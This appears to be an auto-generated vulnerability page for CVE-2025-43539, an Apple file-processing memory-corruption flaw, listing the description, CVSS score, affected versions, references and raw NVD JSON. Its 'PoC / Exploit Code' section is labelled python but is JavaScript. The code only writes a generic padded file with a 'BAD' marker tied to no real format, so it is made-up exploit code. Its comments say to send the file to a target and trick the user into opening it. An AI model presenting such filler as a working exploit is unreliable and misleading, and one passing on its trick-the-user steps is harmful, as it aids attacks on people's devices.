CVE-2025-43539

Description

The issue was addressed with improved bounds checks. This issue is fixed in iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Sequoia 15.7.3, macOS Sonoma 14.8.3, macOS Tahoe 26.2, tvOS 26.2, visionOS 26.2, watchOS 26.2. Processing a file may lead to memory corruption.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE

Apple iOS < 18.7.3

Apple iPadOS < 18.7.3

Apple iOS < 26.2

Apple iPadOS < 26.2

Apple macOS Sequoia < 15.7.3

Apple macOS Sonoma < 14.8.3

Apple macOS Tahoe < 26.2

Apple tvOS < 26.2

Apple visionOS < 26.2

Apple watchOS < 26.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-43539 PoC - Malicious File Generator
// This PoC demonstrates the concept of crafting a malicious file
// that could trigger memory corruption in affected Apple products

const fs = require('fs');

function generateMaliciousFile() {
    // Create a file with specific byte patterns designed to trigger
    // bounds checking issues in file parsers
    
    const header = Buffer.from([
        0x00, 0x00, 0x00, 0x00,  // File header
        0xFF, 0xFF, 0xFF, 0xFF,  // Potential overflow marker
    ]);
    
    // Craft payload with oversized data to trigger bounds check failure
    const oversizedPayload = Buffer.alloc(65536, 0x41);
    
    // Malformed structure to trigger parsing vulnerability
    const malformedStructure = Buffer.from([
        0x42, 0x41, 0x44, 0x00,  // 'BAD' marker
        0xFF, 0xFE, 0xFD, 0xFC,  // Corrupted length field
    ]);
    
    const poc = Buffer.concat([header, oversizedPayload, malformedStructure]);
    
    fs.writeFileSync('CVE-2025-43539_malicious_file.bin', poc);
    console.log('[+] PoC file generated: CVE-2025-43539_malicious_file.bin');
    console.log('[+] File size:', poc.length, 'bytes');
    console.log('[+] Send this file to target user for exploitation');
}

generateMaliciousFile();

// Usage: node poc.js
// Then trick user into opening the generated file

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-43539
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-43539
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-43539/
[4] VulDB https://vuldb.com/cve/CVE-2025-43539
[5] https://support.apple.com/en-us/125884
[6] https://support.apple.com/en-us/125885
[7] https://support.apple.com/en-us/125886
[8] https://support.apple.com/en-us/125887
[9] https://support.apple.com/en-us/125888
[10] https://support.apple.com/en-us/125889
[11] https://support.apple.com/en-us/125890
[12] https://support.apple.com/en-us/125891

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-43539", "sourceIdentifier": "[email protected]", "published": "2025-12-12T21:15:57.583", "lastModified": "2026-04-02T19:21:01.847", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The issue was addressed with improved bounds checks. This issue is fixed in iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Sequoia 15.7.3, macOS Sonoma 14.8.3, macOS Tahoe 26.2, tvOS 26.2, visionOS 26.2, watchOS 26.2. Processing a file may lead to memory corruption."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.8.3", "matchCriteriaId": "8E37DC2A-33E6-480B-8DFE-4F6558F0A895"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.3", "matchCriteriaId": "3428C860-E02D-4FE9-96F4-58EEAAB8321D"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125884", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125885", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125886", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125887", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125888", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125889", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125890", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125891", "source": "[email protected]"}]}}